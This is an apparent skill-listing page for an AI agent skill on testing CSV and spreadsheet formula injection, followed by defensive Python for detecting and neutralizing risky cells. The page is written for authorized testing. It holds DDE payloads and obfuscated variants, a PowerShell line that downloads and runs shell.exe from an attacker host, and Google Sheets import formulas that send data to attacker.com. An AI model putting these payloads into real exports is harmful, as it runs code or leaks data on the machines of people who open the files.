
Csv Formula Injection
Test CSV and spreadsheet exports for formula, DDE, and cloud-sheet injection when user-controlled data becomes spreadsheet cells.
Overview
csv-formula-injection is an agent skill most often used in Ship (also Build integrations, Operate iterate) that guides authorized testing for formula and DDE injection in CSV and spreadsheet export paths.
Install
npx skills add https://github.com/yaklang/hack-skills --skill csv-formula-injection
What is this skill?
- Covers CSV/spreadsheet formula injection triggers (=, +, -, @) and lab DDE-style patterns
- Documents Excel, LibreOffice Calc, and Google Sheets IMPORT-style cloud primitives
- Includes obfuscation angles and a controlled, consent-first testing methodology
- Routes testers to prefix characters when validating back-office reports and user exports
- Stresses explicit authorization—no client-side execution tests without program rules
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
User-controlled fields in CSV exports can become executable spreadsheet formulas when analysts open files in Excel or similar tools.
Who is it for?
Builders running permitted security reviews on reporting, admin export, and import features that feed spreadsheets.
Skip if: Unauthorized targets, mass phishing via crafted CSV, or production testing without explicit scope and consent.
When should I use this skill?
Exports, imports, or user fields feed spreadsheets or reporting tools and you need authorized formula/DDE injection test cases.
What do I get? / Deliverables
You can reproduce prefix and DDE-style issues in a lab, document findings, and harden serializers and download headers before production exposure.
- Prefix and DDE test cell matrix for lab reproduction
- Documented findings with severity and remediation notes for serializers and Content-Disposition headers
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf is Ship → security because the skill governs authorized verification before release of export, import, and reporting features. Subphase security matches offensive-defensive testing of data-handling paths that become Excel, LibreOffice, or Google Sheets formulas.
Where it fits
Sanitize ticket export columns before the billing CSV hits a finance team’s Excel macros.
Pre-release pentest pass on admin ‘download all users’ reporting endpoints.
Reproduce a researcher report that a name field executes =HYPERLINK when opened in LibreOffice.
How it compares
Use as a focused spreadsheet injection playbook during Ship security review, not as generic OWASP Top 10 coverage or a passive SAST-only skill.
Common Questions / FAQ
Who is csv-formula-injection for?
Solo founders and indie devs with bug-bounty or internal appsec hats who own CSV export, CRM dumps, or ticketing downloads.
When should I use csv-formula-injection?
In Ship security before launching exports; in Build integrations when designing import/export APIs; and in Operate iterate when a customer reports odd behavior opening your CSV in Excel.
Is csv-formula-injection safe to install?
The skill describes high-impact lab payloads—review Security Audits on this page and only run tests on systems you are explicitly authorized to assess.
SKILL.md - Csv Formula Injection
# SKILL: CSV Formula Injection

> **AI LOAD INSTRUCTION**: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where **explicitly authorized**; payloads that invoke local commands or remote fetches are **impactful**—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests.

## 0. QUICK START

Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula):

```text
=
+
-
@
```

Test cells may look like:

```csv
name,value
test,=1+1
test,+1+1
test,-1+1
test,@SUM(1+1)
```

**Routing note**: when testing CSV exports, back-office reports, or user data opened in spreadsheets, prioritize these prefix characters.

---

## 1. DDE INJECTION (EXCEL / LIBREOFFICE)

Dynamic Data Exchange (DDE) and external-call patterns have historically been abused in spreadsheets. Examples for **controlled lab** reproduction:

```text
DDE("cmd";"/C calc";"!A0")A0
```

```text
@SUM(1+1)*cmd|' /C calc'!A0
```

```text
=2+5+cmd|' /C calc'!A0
```

```text
=cmd|' /C calc'!'A1'
```

PowerShell-style chaining (lab only; replace host and payload with benign equivalents):

```text
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
```

---

## 2. OBFUSCATION

Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed):

```text
AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
```

Extra whitespace after `=`:

```text
= cmd|'/c calc.exe'!A
```

Dispersed characters / unusual spacing (conceptual pattern—adjust per parser):

```text
= C m D |'/c calc.exe'!A
```

`rundll32` style:

```text
=rundll32|'URL.dll,OpenURL calc.exe'!A
```

---

## 3. GOOGLE SHEETS

If exported data is later opened in **Google Sheets**, or sheets pull from untrusted CSV, these functions can cause **outbound requests** or **cross-document data pulls**:

**Data exfiltration / probe (replace URL with your authorized callback):**

```text
=IMPORTXML("http://attacker.com/", "//a/@href")
```

Other high-risk imports:

```text
=IMPORTRANGE("spreadsheet_url", "range")
=IMPORTHTML("http://attacker.com/table", "table", 1)
=IMPORTFEED("http://attacker.com/feed.xml")
=IMPORTDATA("http://attacker.com/data.csv")
```

Document which function executed and what network side effects occurred.

---

## 4. TESTING METHODOLOGY

1. **Map sinks** — Any feature that emits **CSV, XLSX, or tab-separated** output: admin exports, audit logs, user rosters, billing reports, search results.
2. **Trace user-controlled fields** — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input.
3. **Inject formula prefixes** — Start with benign arithmetic (`=1+1`, `+1+1`) to detect evaluation; escalate only per rules.
4. **Open in target software** — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators.
5. **Evidence** — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version.

**Note**: focus on the `user input -> export -> opened in spreadsheet software` chain.

---

## 5. DEFENSE

Application and export-layer mitigations:

- **Prefix with single quote** — In many spreadsheet apps, leading `'` forces **text** interpretation: `'=cmd|...` displays literally.
- **Prefix with tab** — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly.
- **Strip or neutralize leading triggers** — Remove or escape leading `=`, `+`, `-`, `@` (and Unicode lookalikes) at export time.
- **CSV encoding** — Use
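As an added defender-side example (not the skill's own code), the following Python covers both the detection step of section 4 and the leading-quote mitigation of section 5: it scans an exported CSV for cells a spreadsheet would evaluate as formulas, then shows a serializer that neutralizes them at export time. The trigger set and the small Unicode-lookalike table are assumptions chosen for illustration, and the sample rows are constructed.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets may treat as
# the start of a formula; tab and CR are included because some importers skip
# them before reading the trigger character.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# Assumed, illustrative set of Unicode lookalikes that some importers normalize
# to the ASCII trigger (fullwidth =, fullwidth +, minus sign, fullwidth @).
LOOKALIKES = {"\uff1d": "=", "\uff0b": "+", "\u2212": "-", "\uff20": "@"}

# Constructed sample export: one clean row and three rows with risky memos.
SAMPLE_EXPORT = (
    "name,memo\n"
    "alice,hello\n"
    'bob,"=HYPERLINK(""http://example.invalid"",""click"")"\n'
    "carol,+1+1\n"
    "dave,@SUM(1+1)\n"
)


def is_risky(value: str) -> bool:
    """True if a spreadsheet app may interpret this cell as a formula."""
    if not value:
        return False
    first = LOOKALIKES.get(value[0], value[0])
    return first in FORMULA_TRIGGERS


def neutralize(value: str) -> str:
    """Force text interpretation by prefixing a single quote (section 5).
    Trade-off: phone numbers like '+44 ...' and negatives are quoted too."""
    return "'" + value if is_risky(value) else value


def find_risky_cells(csv_text: str):
    """Scan an exported CSV; return (row, column, value) for each risky cell."""
    rows = list(csv.reader(io.StringIO(csv_text)))
    return [(r, c, v) for r, row in enumerate(rows)
            for c, v in enumerate(row) if is_risky(v)]


def safe_export(rows) -> str:
    """Serialize rows with every cell neutralized and every field quoted."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(str(cell)) for cell in row])
    return out.getvalue()
```

Re-scanning the output of `safe_export` with `find_risky_cells` should return an empty list; that round trip is a cheap regression check for an export endpoint.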